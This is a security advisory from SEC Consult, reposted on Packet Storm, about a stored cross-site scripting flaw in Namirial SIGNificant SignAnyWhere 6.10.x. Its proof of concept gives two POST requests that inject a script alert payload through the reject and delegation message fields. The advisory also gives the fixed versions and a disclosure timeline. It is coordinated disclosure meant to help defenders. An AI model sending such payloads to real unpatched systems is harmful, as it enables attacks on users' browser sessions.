exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Namirial SIGNificant SignAnyWhere 6.10.x Cross Site Scripting

Namirial SIGNificant SignAnyWhere 6.10.x Cross Site Scripting
Posted Jul 30, 2020
Authored by Philipp Espernberger | Site sec-consult.com

Namirial SIGNificant SignAnyWhere versions 6.10.60.25434 and 6.10.100.25817 suffer from a persistent cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | f1f328b29dff74e4d952fa4373e9d20661bd0e05eaba6a1b6734c53afefab851

Namirial SIGNificant SignAnyWhere 6.10.x Cross Site Scripting

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20200728-0 >
=======================================================================
title: Stored Cross-Site Scripting (XSS) Vulnerability
product: Namirial SIGNificant SignAnyWhere
vulnerable version: v6.10.60.25434 (SSP v4.22.60.25434)
v6.10.100.25817 (SSP v4.22.100.25817)
fixed version: v19.76.0.26030 (SSP v19.76.0.26030)
v20.14.0.26049 (SSP v20.14.0.26049)
CVE number: -
impact: high
homepage: https://www.namirial.com/en/
found: 2020-04-01
by: Philipp Espernberger (Office Linz)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Namirial is a Trust Service Provider, focused on addressing the fast growing
market of Digital Transaction Management (DTM), which includes legally compliant
electronic signatures, managing and tracking documents flows, conducting secure
transactions and ensuring secure storage of data."

Source: https://www.namirial.com/en/trust-services/


Business recommendation:
------------------------
Update to the latest version of Namirial SIGNificant SignAnyWhere.

An in-depth security analysis performed by security professionals is highly
advised, as the software may be affected from further security issues.


Vulnerability overview/description:
-----------------------------------
1. Stored Cross-Site Scripting (Authenticated access)
Due to the lack of input validation and output sanitization, an attacker, who was
granted access to a document that is provided by a customer via email, can inject
malicious JavaScript code, which will be executed in the browser of a user.


Proof of concept:
-----------------
1. Stored Cross-Site Scripting (Authenticated access)
The following method can be used to exploit the stored cross-site scripting
vulnerability.

Click the link, which was sent to you via email for signing the document.

There are 2 possibilities to inject a cross-site scripting payload:
1: Reject the document.
2: Delegate the document.

The request below shows that an attacker can inject a malicious payload
via the rejection functionality (the RejectMessage key is affected).

POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep HTTP/1.1
Host: $host
---snip---
{"basicParameters":{"WorkstepId":"<removed>", "GeolocationLongitude":0,"GeolocationLatitude":0,
"GeolocationErrorState":"NOT_USED","Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"},
"rejectConfiguration":"{\"RejectMessage\":\"<script>alert(location.origin)</script>\",\"Type\":\"Reject\"}"}

Using the same process an attacker can also inject a malicious payload
via the delegation functionality (the delegationReason key is affected).

POST /SawViewer/SignAnywhereServices.asmx/RejectWorkstep HTTP/1.1
Host: $host
---snip---

{"basicParameters":{"WorkstepId":"<removed>", "GeolocationLongitude":0,"GeolocationLatitude":0,
"GeolocationErrorState":"GEOLOC_NO_TIMEOUT","Accuracy":-1,"UsedLanguage":"de","SupportId":"<removed>"},
"rejectConfiguration":"{\"RejectMessage\":\"",\"Type\":\"Delegation\",\"AdditionalInformation\":\"
{\\\"firstName\\\":\\\"name\\\",\\\"lastName\\\":\\\"name\\\",\\\"email\\\":\\\"delegation mail\\\",
\\\"phoneNumber\\\":\\\"phone number\\\",\\\"delegationReason\\\":\\\"<script>alert(location.origin)</script>\\\"}\"}"}

The injected cross-site scripting payload is stored within the application and
upon opening the document the payload will be automatically executed.


Vulnerable / tested versions:
-----------------------------
The following versions of the software have been tested and found to be vulnerable:
* Namirial SIGNificant SignAnyWhere version v6.10.60.25434 (SSP v4.22.60.25434)
* Namirial SIGNificant SignAnyWhere version v6.10.100.25817 (SSP v4.22.100.25817)

Previous and newer versions may also be affected.


Vendor contact timeline:
------------------------
2020-04-03: Contacting vendor through contact form (https://www.namirial.com/de/kontaktformular/)
2020-04-08: Response from the vendor with the contact details.
2020-04-10: Contact person requests to obtain advisory via Support Platform (Upload Report).
2020-04-10: Advisory uploaded to vendor.
2020-05-26: Vendor released updated versions (19.76 and 20.14 )
2020-06-18: Testing patched version (v19.76.0.26030)
2020-07-28: Coordinated release of security advisory


Solution:
---------
Upgrade Namirial SIGNificant SignAnyWhere to version v19.76.0.26030 (SSP v19.76.0.26030) or
Upgrade Namirial SIGNificant SignAnyWhere to version v20.14.0.26049 (SSP v20.14.0.26049)


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF P. Espernberger / @2020


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close